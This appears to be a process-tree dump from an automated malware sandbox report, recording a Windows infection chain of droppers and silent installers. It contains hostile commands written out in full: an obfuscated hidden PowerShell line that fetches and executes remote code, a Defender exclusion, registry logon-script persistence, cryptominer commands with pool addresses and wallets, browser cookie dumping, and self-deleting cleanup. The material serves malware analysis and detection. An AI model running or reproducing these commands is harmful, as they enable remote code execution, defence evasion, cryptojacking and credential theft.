C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe"C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe" /ustwo INSTALL15⤵PID:7104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "b5farklrqxa.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe" & exit16⤵PID:6292
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "b5farklrqxa.exe" /f17⤵
- Kills process with taskkill
PID:2192
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe"C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe" ll12⤵PID:3128
-
C:\Users\Admin\AppData\Local\Temp\is-77T48.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-77T48.tmp\setups.tmp" /SL5="$20266,635399,250368,C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe" ll13⤵PID:4900
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:4524
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5472
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6004
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:2448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 94812⤵
- Program crash
PID:7776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 95212⤵
- Program crash
PID:8764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 108412⤵
- Program crash
PID:6984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 106012⤵
- Program crash
PID:6880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 100812⤵
- Program crash
PID:6944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 106812⤵
- Program crash
PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 120412⤵
- Program crash
PID:7800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 149212⤵
- Program crash
PID:4028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 162812⤵
- Program crash
PID:5432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 158812⤵
- Program crash
PID:9224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 168412⤵
- Program crash
PID:9872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 172412⤵
- Program crash
PID:9532
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵PID:5788
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4528
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵PID:1632
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:5072
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:9204
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:8896
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:8496
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:7176
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5072 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:9064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 507214⤵
- Kills process with taskkill
PID:9036
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵PID:8592
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kw4hywyvcq5\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\kw4hywyvcq5\cpyrix.exe" /VERYSILENT8⤵PID:4516
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:580
-
C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe" /SpecialRun 4101d8 574411⤵PID:5188
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:7456
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:7532
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:7660
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 158410⤵
- Program crash
PID:4336
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6884
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5156
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:7480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe"C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe" /ustwo INSTALL8⤵PID:4668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "yswjnvbxh0v.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe" & exit9⤵PID:6124
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "yswjnvbxh0v.exe" /f10⤵
- Kills process with taskkill
PID:4544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe"C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe" /VERYSILENT8⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\is-B95NR.tmp\0dqushsuims.tmp"C:\Users\Admin\AppData\Local\Temp\is-B95NR.tmp\0dqushsuims.tmp" /SL5="$40304,2592217,780800,C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe" /VERYSILENT9⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\is-KAL5D.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-KAL5D.tmp\winlthsth.exe"10⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"11⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"12⤵PID:6228
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:4680
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xouipvbiapf\app.exe"C:\Users\Admin\AppData\Local\Temp\xouipvbiapf\app.exe" /8-238⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe"C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe"8⤵PID:5148
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe"9⤵PID:4252
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\is-PSEAR.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-PSEAR.tmp\IBInstaller_97039.tmp" /SL5="$30278,14574851,721408,C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5420
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5676
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:8288
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\chrome_proxy.exe"10⤵PID:9616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe" /silent /subid=4828⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\is-G8QTV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-G8QTV.tmp\vpn.tmp" /SL5="$20334,15170975,270336,C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe" /silent /subid=4829⤵PID:5480
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4132
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5976
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6528
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:3320
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:10152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe"C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe" /quiet SILENT=1 AF=7568⤵PID:5356
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173330 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:192
-
-
-
C:\Users\Admin\AppData\Local\Temp\tab550kvzxg\vict.exe"C:\Users\Admin\AppData\Local\Temp\tab550kvzxg\vict.exe" /VERYSILENT /id=5358⤵PID:4188
-
-
C:\Users\Admin\AppData\Local\Temp\wgbsixipou5\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\wgbsixipou5\KiffApp1.exe"8⤵PID:4784
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\AppData\Local\Temp\is-UD089.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UD089.tmp\setups.tmp" /SL5="$4010E,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
PID:4612 -
C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"5⤵PID:4168
-
C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"6⤵PID:3892
-
-
-
C:\Users\Admin\AppData\Roaming\EB8F.tmp.exe"C:\Users\Admin\AppData\Roaming\EB8F.tmp.exe"5⤵PID:732
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:1888
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:4272
-
-
-
C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe"C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe"5⤵PID:4980
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe6⤵PID:6516
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6976
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5688
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:8664
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7976
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:956
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\is-63CQT.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-63CQT.tmp\vict.tmp" /SL5="$10332,870426,780800,C:\Users\Admin\AppData\Local\Temp\tab550kvzxg\vict.exe" /VERYSILENT /id=5351⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\is-8RDIH.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-8RDIH.tmp\win1host.exe" 5352⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\VyZ6hzGVH.exe"C:\Users\Admin\AppData\Local\Temp\VyZ6hzGVH.exe"3⤵PID:6428
-
C:\Users\Admin\AppData\Local\Temp\VyZ6hzGVH.exe"C:\Users\Admin\AppData\Local\Temp\VyZ6hzGVH.exe"4⤵PID:4404
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 15083⤵
- Program crash
PID:8212
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5628
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7429C113CF2CF9CBF3CF726A9E03EEAB C2⤵PID:3024
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E1F0651981B31E86B76177DF2FA320332⤵PID:4260
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:5840
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:7564
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4744
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\is-N4EFG.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-N4EFG.tmp\Setup3310.tmp" /SL5="$70320,138429,56832,C:\Users\Admin\AppData\Local\Temp\v01fwumddr4\Setup3310.exe" /Verysilent /subid=5771⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\is-UKQ9O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UKQ9O.tmp\Setup.exe" /Verysilent2⤵PID:5776
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6712
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6376
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7924
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6044
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7726803b-54c2-4d43-9cfb-101bbe9a3a6d}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7912
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:7992
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:8336
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9188
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4608
-
C:\Users\Admin\AppData\Local\Temp\2592.exeC:\Users\Admin\AppData\Local\Temp\2592.exe1⤵PID:8304
-
C:\Users\Admin\AppData\Local\Temp\3FC2.exeC:\Users\Admin\AppData\Local\Temp\3FC2.exe1⤵PID:4640
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:8160
-
C:\Users\Admin\AppData\Local\Temp\8836.exeC:\Users\Admin\AppData\Local\Temp\8836.exe1⤵PID:2688
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\9AE4.exeC:\Users\Admin\AppData\Local\Temp\9AE4.exe1⤵PID:7452
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9892
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10036
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8664
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:10060
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9700
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9444
-
